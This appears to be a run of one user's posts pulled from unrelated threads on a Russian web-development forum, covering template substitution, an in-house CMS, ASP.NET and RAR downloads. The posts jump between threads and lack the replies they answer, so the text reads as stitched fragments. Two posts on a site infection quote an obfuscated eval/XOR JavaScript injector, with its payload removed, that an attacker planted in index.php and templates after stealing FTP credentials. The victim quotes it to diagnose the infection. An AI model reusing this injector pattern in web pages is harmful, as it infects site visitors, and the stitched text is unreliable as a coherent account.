а вот вывести в {config} это кажись смартли или чтото вроди этого
Достаточно просто использовать str_replace, у меня так своя CMS организована и без всяких смарти, ну правда я str_replace немного доработал в своих целях, типа свой API для работы с шаблонами сделал.
Но в данном простом случаи просто str_replace вполне хватит.
может у кого-нибудь появилась информация что это, для чего и откуда?
На форуме Каспера мне сказали, что не важно что он делает, но скорей всего он устанавливает себя на компьютеры клиентов после посещения сайтов, и снова ворует пароли. Хотя мне кажется у него (у самого трояна на JS кода), должна быть и какая-то другая задача, возможно формирование бот-сети.
ScorpionDS, а какой хостинг вы используете? у нас вдс и таже проблема, быть может вы используем один и тот же сервер?
Нет, у нас свой арендованный сервер, там левака почти нет, но дни проект был вообще на стороннем хостинге. Я склоняюсь к версии, которую тут высказали, что пароли ушли через Тотал.
Завтра на работе я буду знать больше, админ обещал посмотреть по логам, кто заходил по ФТП и по возможности что делал скрипт.
Нет, именно автоматически, я нажал "Разместить тему" и в итоге сразу получил отредактированное сообщение.
Вот тема там, так ни кто и не ответил:
_http://forum.kaspersky.com/index.php?showtopic=157213
Сегодня мне позвонили с работы, сказали что два из почищенных вчера сайта снова зараженные, админ еще не менял пароли, сказал, хочет проследить как это делается.
Дело в том, что я обнаружил его еще с месяц назад, тогда решил что это кто-то из наших поставил счетчик так странно, а потом просто забыл, всех опросить, чья это работа.
И не замечал бы, если бы сегодня у клиента не перестал работать сайт ...
Только что, создал такую тему на форуме Каспера, когда разметил сообщение, увидел такое:
Цитата:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","здесь был код вируса"];eval(rpnsxy[0]);</script>
А с хостером связывались? Или у Вас выделенный собственный сервер?
У нас вой выделительный сервер, и одни не наш, а на сторонней площадке, там та же проблема.
Связались, с нашим админом, он сказал, что знает в чем дело, по его словам был украден пароль от ФТП, и робот по шаблону находит файлы и внедряет там этот код, и вроде он корейского производства. Вот только какое назначение этого кода он не сказал, но обещал разобраться с проблемой.
Сегодня на позвонил клиент и сказал, что его сайт не работает, при открытии в IE выскакивало окно с ошибкой, после чего страница перезагружалась и страница не могла отобразиться, ну вроде как 404.
Стали разбираться в чем дело, и выяснили что в конец кода страницы, добавлен не известный нам скрипт:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","здесь был код вируса"];eval(rpnsxy[0]);</script>
стали искать, как он туда попадает, и выяснили, что он внедряется в index.php, а также в базовый шаблон index.tpl, причем в локальных версиях все нормально.
Когда после универа пришел на работу, была поставлена задача разработать свою CMS, опыта тогда в этом было мало, в паре со мной работала еще девушка программист.
Так вот за 6 месяцев мы разработали свою CMS и запустили на ней сайт фирмы и еще один дочерний проект. Используем эту систему по сей день, то есть уже 3,5 года, реализовали множество коммерческих проектов.
Функционал:
- гибкое дерево страниц;
- на страницах блочная структура (зависит от шаблона страницы), в каждом блоке может находится несколько различных модулей, от обычного текста, то функционала Интернет магазина;
- настройка/наполнение сложных (Интернет магазина, новостей, каталогов) модулей выносится в отдельный интерфейс, на самой страницы ставится только "ссылка" на функционал, модули такие как "текст" редактируются прямо на странице;
- права просмотра/редактирования устанавливаются на каждую страницу отдельно, получается что в любом месте дерева сайта, можно организовать закрытую зону;
- управление пользователями и группами;
- всякие настройки
Несмотря на попытку реализовать максимальную функциональность, запросы у клиентов бывают весьма своеобразные, так что под клиента основные модули приходится переделывать (такие как: каталоги и магазины).
Шаблон полностью отделены от php кода, и представляют собой просто фрагменты HTML, тоже самое в АЦ.
Правда сейчас спустя уже 3,5 года понятно, что было допущено очень много ошибок проектирования, места отсутствует ООП, уже в разработке новая версия системы, вот только из-за занятости на коммерческих проектах, нам ни кто не выделяет достаточно времени на ее разработку.
Я догадываюсь, кто это говорит - Microsoft. Я сам лично имел дело с ASP.NET (и VS как IDE). И не скажу, чтобы там было что-то особенное. Возможности - такие же как в php, только мне, к примеру, их излишняя зацикленность на событиях, ООП где надо и не надо раздражала.
Я сам решил начать изучать ASP.NET, меня уже давно приятель убеждает что за ним будущие.
Вначале вроде все было довольно удобно, и на первый взгляд многие их стандартные решения были весьма удобными, но вот когда дошел до работы с БД, то это что-то ...
Если использовать их стандартное решение на объектах, то простой код превращает в довольно громоздкое решение и действительно очень напрягает повышенная "объектность". Хотя может я просто туго понимаю или литература попалась не удачная (книга некого Дино Экспозито или как-то так), но мне показалось их реализация работы с БД слишком сложная для сайта.
Хотя продолжать изучать наверно буду, так ЗП для программистов ASP.NET больше ...
Собственно с таким сталкивался постоянно (я просто выбирал "сохранить по ссылке"), но сейчас требуется это решить это более красивым способом, что бы RAR архивы скачивались, а не открывались в браузере.
Подскажите, кто пытался решить эту проблему?
Через ".htaccess" ни чего не вышло.
Вариант настроить Оперу для правильной реакции на этот файл не устраивает (нельзя же, всех посетителей сайта, предварительно просить настроить оперу ...), загружать файлы в ZIP также не подходит, заказчику требуется именно RAR.
В поиске ни чего толкового не нашел, вопрос поднимался, но везде советуют или настроить оперу или загружать ZIP, а не RAR.